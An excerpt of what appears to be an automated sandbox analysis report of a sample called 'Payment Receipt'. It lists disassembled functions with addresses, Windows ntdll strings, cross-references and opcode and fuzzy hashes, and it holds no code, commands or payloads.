                                                                      • Opcode ID: 3dd17c5f007d688c5917f5a8846d13839c8e721569a95ea58629f28e1c0759a2
                                                                      • Instruction ID: 3295c400d32c755ead8073b88f114a50807e39d0572a72e34ca5ec070d8f01b0
                                                                      • Opcode Fuzzy Hash: 3dd17c5f007d688c5917f5a8846d13839c8e721569a95ea58629f28e1c0759a2
                                                                      • Instruction Fuzzy Hash: 2F11CD313261029FDB2ECA18D885BBBB3A5BF40B16F198169F4068F291DB34D841CB55
                                                                      Function 016220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01622104
                                                                      • Process initialization failed with status 0x%08lx, xrefs: 016220F3
                                                                      • LdrpInitializationFailure, xrefs: 016220FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2986994758
                                                                      • Opcode ID: 9d143a6c6fa914ee332bf7aa93f854caae9a2eb12e76a9afd4769685983d17bb
                                                                      • Instruction ID: 219c2f44e49734ab5a2b7ca7e89c7859ac03b509d44dbe4221a1e6693f6c7a72
                                                                      • Opcode Fuzzy Hash: 9d143a6c6fa914ee332bf7aa93f854caae9a2eb12e76a9afd4769685983d17bb
                                                                      • Instruction Fuzzy Hash: 99F0AF75640719ABEB24EA4C9C5AFA93BADFB40A54F20005DFB007B785D2A0A950CA95
                                                                      Function 015B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: #%u
                                                                      • API String ID: 48624451-232158463
                                                                      • Opcode ID: af626a1fd48ce93b38a356019019b7bb8dd27961d32e0bece709f56fb2dded21
                                                                      • Instruction ID: e556e5e67d44f6aa9b70610324a4a6dcc02c878bf4333edfc40386924285a7e4
                                                                      • Opcode Fuzzy Hash: af626a1fd48ce93b38a356019019b7bb8dd27961d32e0bece709f56fb2dded21
                                                                      • Instruction Fuzzy Hash: A7713C71A0014A9FDB15DFA8CD94BAEB7F8BF48744F144465EA05EB291EB38ED01CB60
                                                                      Function 015B52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@
                                                                      • API String ID: 0-149943524
                                                                      • Opcode ID: 33fb22162f463a09b12f5d2396be06364f3140b34a33af630ae1bddc7fab3de2
                                                                      • Instruction ID: 431a61af5d52a012d799447b4886069c618e745507dbc7f240765dfa833022e5
                                                                      • Opcode Fuzzy Hash: 33fb22162f463a09b12f5d2396be06364f3140b34a33af630ae1bddc7fab3de2
                                                                      • Instruction Fuzzy Hash: 64328A706183528BD7298F18C8C0BBFBBE1BF85744F14492EFA959B290E774D894CB52
                                                                      Function 015AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrResSearchResource Enter, xrefs: 015AAA13
                                                                      • LdrResSearchResource Exit, xrefs: 015AAA25
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                      • API String ID: 0-4066393604
                                                                      • Opcode ID: e468e5e84bf198e212ac96c2ff69509ae08fd57aa65c09cd774ecdb172874588
                                                                      • Instruction ID: 65fab12d54d92ce3846a06434e626d4d650bb68de38b74e0fc7d0bbb1b624063
                                                                      • Opcode Fuzzy Hash: e468e5e84bf198e212ac96c2ff69509ae08fd57aa65c09cd774ecdb172874588
                                                                      • Instruction Fuzzy Hash: 58E19171E802199FEB26CF9DCD94BAEBBB9BF48350F50442AE901EB381D7749941CB50
                                                                      Function 0166A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                      • Instruction ID: c34e93c28dd7446cfdc7954f0ed0c26b322c9d1f2ac0511681b8124322370655
                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                      • Instruction Fuzzy Hash: 0EC1BE312043429BE724CF68CC41B6BBBE9AFD4318F084A2DF696EB291D775D905CB91
                                                                      Function 015A0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Failed to retrieve service checksum., xrefs: 015FEE56
                                                                      • ResIdCount less than 2., xrefs: 015FEEC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                      • API String ID: 0-863616075
                                                                      • Opcode ID: 5547c89d2f82734efed1612a76bdcf44c26390552208a1eab8df4355337dc7e3
                                                                      • Instruction ID: 9c476cd76c8807a366745fc172e8c1285d0a238e8047716a53569596ed000d8b
                                                                      • Opcode Fuzzy Hash: 5547c89d2f82734efed1612a76bdcf44c26390552208a1eab8df4355337dc7e3
                                                                      • Instruction Fuzzy Hash: E7E1F4B19087859FE364CF15C440BAFBBE4FB88314F40892EE6999B390D7719509CF96
                                                                      Function 0161E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: dee7268c6d6497239cafda3bf37bc9961234438f2712e14d95a5646e33adf47c
                                                                      • Instruction ID: 2444766cc0fff04f8b78dd86111f67850dad79e257980ede947b767793315bf2
                                                                      • Opcode Fuzzy Hash: dee7268c6d6497239cafda3bf37bc9961234438f2712e14d95a5646e33adf47c
                                                                      • Instruction Fuzzy Hash: 48616D71E006099FEB15DFA8CC80BADBBB5FB48700F19446EEA49EB255D732E941CB50
                                                                      Function 016443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$MUI
                                                                      • API String ID: 0-17815947
                                                                      • Opcode ID: e2816eb86be2d7bf3cde7814991aba70da521b365de9f7ecc9212e6d40eaaafb
                                                                      • Instruction ID: 2fbea7d755f02d9904bf2bf9186370783a22a956c1b2c082d8c3f50aba343a57
                                                                      • Opcode Fuzzy Hash: e2816eb86be2d7bf3cde7814991aba70da521b365de9f7ecc9212e6d40eaaafb
                                                                      • Instruction Fuzzy Hash: B2510771E0021EAFDF15DFA9CC85BEEBBBCFB44654F100529E615BB290DB7099058BA0
                                                                      Function 015A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015A063D
                                                                      • kLsE, xrefs: 015A0540
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 0-2547482624
                                                                      • Opcode ID: 1a6503ce8631f4e391d74a35b00973b76fa4d4d409ab8679a9d41fd57058375d
                                                                      • Instruction ID: ded9aa301f4ad4ecef74ea096550d3d4919d8c7de61d1a78175052092aa785fd
                                                                      • Opcode Fuzzy Hash: 1a6503ce8631f4e391d74a35b00973b76fa4d4d409ab8679a9d41fd57058375d
                                                                      • Instruction Fuzzy Hash: D4519F715647428FD724EF68C5406ABBBE4BF85304F50483EE6DA8B281E770E545CB92
                                                                      Function 015AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 015AA309
                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 015AA2FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                      • API String ID: 0-2876891731
                                                                      • Opcode ID: 4343daf7f0991d8acba20368a6ebb35d9e6fb51e68ff39c39b73ccade2208d11
                                                                      • Instruction ID: c2caeaa774fedf8cb83946709b0add43b7f7217a057de71f32ea18ce461500a0
                                                                      • Opcode Fuzzy Hash: 4343daf7f0991d8acba20368a6ebb35d9e6fb51e68ff39c39b73ccade2208d11
                                                                      • Instruction Fuzzy Hash: EC418B30A44A55DBEB168F69D894B6EBBF4FF84704F1444AAE900DF391E3B5D900CB50
                                                                      Function 015DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Cleanup Group$Threadpool!
                                                                      • API String ID: 2994545307-4008356553
                                                                      • Opcode ID: 741652cc824a68d61b2f8340d5eb8a2ef43d074ce76d13def1e3fee5bc865aff
                                                                      • Instruction ID: 6606729101c10bccacbe3d585eee9480237a754ff2292f0eda8a2ed841cba79a
                                                                      • Opcode Fuzzy Hash: 741652cc824a68d61b2f8340d5eb8a2ef43d074ce76d13def1e3fee5bc865aff
                                                                      • Instruction Fuzzy Hash: 3E01ADB2654704EFE321DF28CD46B2677E8F784715F048939A648CB190E3B4D804CB46
                                                                      Function 015AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MUI
                                                                      • API String ID: 0-1339004836
                                                                      • Opcode ID: 1d293f7b7b3a004418fa7ca700a6908ed37ba307bee72ce042f17f2ca8909900
                                                                      • Instruction ID: 558a6c79bad7980246e81e211297aa363e869ce17cc3d75845748bd4e49872ca
                                                                      • Opcode Fuzzy Hash: 1d293f7b7b3a004418fa7ca700a6908ed37ba307bee72ce042f17f2ca8909900
                                                                      • Instruction Fuzzy Hash: 4A827B75E802198FEB25DFA9C880BEDBBB1BF48310F94816AE919AF750D7709941CF50
                                                                      Function 015F2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P`vRbv
                                                                      • API String ID: 0-2392986850
                                                                      • Opcode ID: 0e0e723b67e78d5edfe7ad51cb0ac91bb2d73a83ecf0d5e9809dc1a214741056
                                                                      • Instruction ID: 72a4acd7a3de0fa1349f5ba5acbc6fc9c135f6d868a9b18d1ffda6e5760d8e66
                                                                      • Opcode Fuzzy Hash: 0e0e723b67e78d5edfe7ad51cb0ac91bb2d73a83ecf0d5e9809dc1a214741056
                                                                      • Instruction Fuzzy Hash: 6342C075D0425AAAFFA9DFACD8486BDBBB1FF45310F14801EE741AF290D6748A81CB50
                                                                      Function 0164CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                      • Instruction ID: 76cc483a2209a65434a33232959b708ecd9e611332d6a3edc8a7b22103930e46
                                                                      • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                      • Instruction Fuzzy Hash: 57621870D012188FCB98DF9AC4D4AADB7B2FF8C311F64819AE9816B745C7356A16CF60
                                                                      Function 015C2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 54408df38ed151c86e71ff8ce42584e03e5e21153ae311b5149ffdd8a1c0ab34
                                                                      • Instruction ID: d132b8585530eefb2ef064ebc1c150570c979a6ebca02db0b86ef8212adbf45b
                                                                      • Opcode Fuzzy Hash: 54408df38ed151c86e71ff8ce42584e03e5e21153ae311b5149ffdd8a1c0ab34
                                                                      • Instruction Fuzzy Hash: 49F1B27160474ACFDB66CFA8C480A6FBBE1BFC8A10F04886DE9959B341DB34D945CB52
                                                                      Function 015A2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 52285ecc463593c389d3aac8444e3f7885fbde4ece912d7d71ebc8fa5ab408be
                                                                      • Instruction ID: dfc27a0b5a4e508800b92e7ae4cf50f8b1ceb054acf0202245097466b32b127a
                                                                      • Opcode Fuzzy Hash: 52285ecc463593c389d3aac8444e3f7885fbde4ece912d7d71ebc8fa5ab408be
                                                                      • Instruction Fuzzy Hash: C1F1AC71D402199BCB65CFA9DC81ABEBBF5FF88704F85402AE941AF350D730A851CBA1
                                                                      Function 0162EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: __aullrem
                                                                      • String ID:
                                                                      • API String ID: 3758378126-0
                                                                      • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                      • Instruction ID: cf2333060c1d4185e9d0835096dffbf5706813697479ab13cb7dc260f31abf85
                                                                      • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                      • Instruction Fuzzy Hash: 1F418D71F0052A9BDF18DEBDC8905AEF7F2FF88310B188279D615E7280D638A9518B90
                                                                      Function 015A0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 06ef9b7e02e87c8118c0e684501e9e1f9c0f08383bff9bf651895f314d07f673
                                                                      • Instruction ID: 0050c21ecc17656db381c7b318c140d28477c665a39e67b73646cbc454a5d1c0
                                                                      • Opcode Fuzzy Hash: 06ef9b7e02e87c8118c0e684501e9e1f9c0f08383bff9bf651895f314d07f673
                                                                      • Instruction Fuzzy Hash: 85A16731A9432A6ADF25CA28CC42BFE6BE5BF85304F44449DFF86AF1C1C6B4D9448B50
                                                                      Function 01654420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: b0d4c221643244e4d09340bb55395432b770b14eb5f1a7ad1352a0b00bfb3f99
                                                                      • Instruction ID: 681983d4ab27642fab62cf4f9298a18443855482f2ac29089b4179a4cfbeaef9
                                                                      • Opcode Fuzzy Hash: b0d4c221643244e4d09340bb55395432b770b14eb5f1a7ad1352a0b00bfb3f99
                                                                      • Instruction Fuzzy Hash: 3DA127316043696ADFB4CA68CC45BF92BA5AF96718F0844D8EE455B381FF74C9C4CB60
                                                                      Function 01626420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 30d35625a6fd2a700ad5db7dbe5b7ac22d0f32ea6a2d68c9683d4bee11e4e0a4
                                                                      • Instruction ID: 85d8b0d30e63840847da8a1a3857ea34238e4e8d072fe1126b72db23fe22a4dd
                                                                      • Opcode Fuzzy Hash: 30d35625a6fd2a700ad5db7dbe5b7ac22d0f32ea6a2d68c9683d4bee11e4e0a4
                                                                      • Instruction Fuzzy Hash: C091407190062AAFEB21DF95CD85FAE7BB8FF54B50F104059EA00BB290D774A900CF61
                                                                      Function 0164E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 46031242494911736095bc26928249b190f6c1d02425a2ac905e2efd2497d3e2
                                                                      • Instruction ID: 694c04f4b7fe3ac5370d6d010109bd53fe289c45ac3294d27a6d3709df2af9df
                                                                      • Opcode Fuzzy Hash: 46031242494911736095bc26928249b190f6c1d02425a2ac905e2efd2497d3e2
                                                                      • Instruction Fuzzy Hash: 74915F31900606AFDB27ABA5DC84FAFBBB9FF85740F100069F505AB250D77A9902CB50
                                                                      Function 015DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalTags
                                                                      • API String ID: 0-1106856819
                                                                      • Opcode ID: 5fde3f0170a0f0b2729d4e903b47a42350c8428d86ff5bda6b5e27bb610eb2a4
                                                                      • Instruction ID: d96a9fd865ec82e7dccef02c10ca1c6f2a44451b39bd48f5bd25546c250a9d3d
                                                                      • Opcode Fuzzy Hash: 5fde3f0170a0f0b2729d4e903b47a42350c8428d86ff5bda6b5e27bb610eb2a4
                                                                      • Instruction Fuzzy Hash: 49717379E0021ACFDF64CF9CD9906ADBBB1BF88710F18812EE905AB345E7719941CB60
                                                                      Function 01644978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .mui
                                                                      • API String ID: 0-1199573805
                                                                      • Opcode ID: 1b818a0cab7b849155609b052ea03c0b084826d4a05c20feb3db4297eb315dff
                                                                      • Instruction ID: 7586acad639525a0c288a78f15760c4623584de063d4bf01cb15bcea8a736313
                                                                      • Opcode Fuzzy Hash: 1b818a0cab7b849155609b052ea03c0b084826d4a05c20feb3db4297eb315dff
                                                                      • Instruction Fuzzy Hash: BA519172D0022A9BDF14DF99DC42BAEBBB4BF44A54F05416AEE11BB344DB349801CBA4
                                                                      Function 015BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EXT-
                                                                      • API String ID: 0-1948896318
                                                                      • Opcode ID: fa76059f58044ccd1d493fa4ce438de1c9f09a2d76771e31217072d43045befd
                                                                      • Instruction ID: f48e0bc769e3e2d0d0985378591c1ec5a78dbf5df06e77511a0d882bd9f8d78e
                                                                      • Opcode Fuzzy Hash: fa76059f58044ccd1d493fa4ce438de1c9f09a2d76771e31217072d43045befd
                                                                      • Instruction Fuzzy Hash: F3416F72508352ABD711DA69D882BEFBBE8FF88614F48092DF584EF180E674D9048796
                                                                      Function 0161C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: 89ada1fa60a23f3cdd0eca47bfc3d3e988116a86670a5f826b52a4b5d08b1cb6
                                                                      • Instruction ID: 54987069c2cebc73b12ff7b50b5fc72ac92578f0d67d6dcc2776586a73436b24
                                                                      • Opcode Fuzzy Hash: 89ada1fa60a23f3cdd0eca47bfc3d3e988116a86670a5f826b52a4b5d08b1cb6
                                                                      • Instruction Fuzzy Hash: D94163B1D4062EABDB21DA50CC84FDEBB7CAB44714F0545E5EB08AB144DB709E898FA4
                                                                      Function 016207C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RyrJ(
                                                                      • API String ID: 0-4203755499
                                                                      • Opcode ID: 20e3840ec191f18d8d0086afffad8d1964db5b39628e767dc553c891dc46c69f
                                                                      • Instruction ID: 95b74bae83b70e5d9454b77833cddfb7e32ffb6f23ebe7cbd56c1c99e43270ae
                                                                      • Opcode Fuzzy Hash: 20e3840ec191f18d8d0086afffad8d1964db5b39628e767dc553c891dc46c69f
                                                                      • Instruction Fuzzy Hash: 15418C72904711AFD720DF29CC45B9BBBE8FF88614F004A2EF998DB250D7709915CB92
                                                                      Function 01636B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: 89dfece819375e8fa7d1faf078b8d49ab8d0fe9a5c6b3c2ac0ca7fdd4a4751e6
                                                                      • Instruction ID: f5d89c837c50bded04e470a6207c9656701ad202ba5d931b1fa1f997fcdeb1c7
                                                                      • Opcode Fuzzy Hash: 89dfece819375e8fa7d1faf078b8d49ab8d0fe9a5c6b3c2ac0ca7fdd4a4751e6
                                                                      • Instruction Fuzzy Hash: FC31F631E00719ABEB26DF69CC54BEE7BB8EF85704F144068EA41AF282D775DA05CB50
                                                                      Function 0161CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: a63a782797a08a2568e90e587d0fa8421fda5e010e0f4ec2fd3e7b2e0a09c53d
                                                                      • Instruction ID: a8ea60e4f82137144c5ebe0137ee92dd75ed3522d297841a9e38a8311f1bb4ca
                                                                      • Opcode Fuzzy Hash: a63a782797a08a2568e90e587d0fa8421fda5e010e0f4ec2fd3e7b2e0a09c53d
